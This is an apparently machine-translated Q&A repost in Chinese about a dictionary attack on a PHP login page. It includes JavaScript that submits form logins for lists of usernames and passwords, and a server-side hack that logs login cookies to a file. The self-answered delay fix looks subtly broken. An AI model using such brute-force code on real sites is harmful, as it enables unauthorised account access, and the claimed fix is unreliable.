[英]Paste returns of a javascript function into Excel (dictionary “attack”)
[英]Checking if the attempt was successful during a Dictionary Attack
我正在做一個項目,其中我必須進行字典攻擊。 我正在運行一個腳本,該腳本發布到登錄頁面將發布到的頁面(例如members.php)。 輸入正確的用戶名和密碼后,只有在服務器端發生的事情是設置了cookie。 Cookies具有用戶名和密碼的sha值。 (是的,我可以訪問源代碼)。
我已經在members.php中對腳本進行了硬編碼,這樣每次有人登錄時都會檢索cookie的值,並將其存儲在服務器中的文本文件中。 因此,我將能夠跟蹤誰成功登錄了。
我正在嘗試將以下腳本發布到members.php,以嘗試查看邏輯是否有效:
function dictionary_run(username,password) {
var theForm, newInput7, newInput8, newInput9;
var i=0,j=0;
var bla3 = "Login";
theForm = document.createElement("form");
theForm.action = "URL/members.php";
theForm.method = "post";
newInput9 = document.createElement("input");
newInput9.type = "text";
newInput9.name = "username";
newInput9.value = username;
newInput8 = document.createElement("input");
newInput8.type = "password";
newInput8.name = "password";
newInput8.value = password;
newInput7 = document.createElement("input");
newInput7.type = "submit";
newInput7.name = "submit";
newInput7.value = bla3;
theForm.appendChild(newInput9);
theForm.appendChild(newInput8);
theForm.appendChild(newInput7);
newInput7.click();
}
function main() {
var user_name = ["jasmine", "fd", "jasmhghine","dfdf"];
var pass_word = ["jasmine", "jasminhge", "dffd","dfdfdf"];
var i,j;
for(i=0; i<4 ;i++) {
for(j=0; j<4;j++) {
dictionary_run(user_name[i],pass_word[j]);
}
}
}
main();
顯然它不起作用。 我知道茉莉花作為密碼和用戶名是正確的(此處為user_name [0]和pass_word [0])。 即使這樣,我的硬編碼在members.php中的腳本也無法捕獲成功的登錄嘗試。
我也試圖用
if(document.cookie) break;
每次提交后。 這也不起作用。 我想不出另一種方法來檢查登錄嘗試是否成功。
任何幫助將不勝感激。 謝謝!
好的,我發現了問題,只是因為我要快速連續發布,所以只檢查了最后一個輸入。 所以我只用了幾秒鍾的延遲就可以了。
for(i=0; i<4;i++) {
for(j=0; j<4;j++) {
var delay=5000;//1 seconds
setTimeout(function(){
dictionary_run(user_name[i],pass_word[j]);
},delay);
}
}
謝謝 !
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.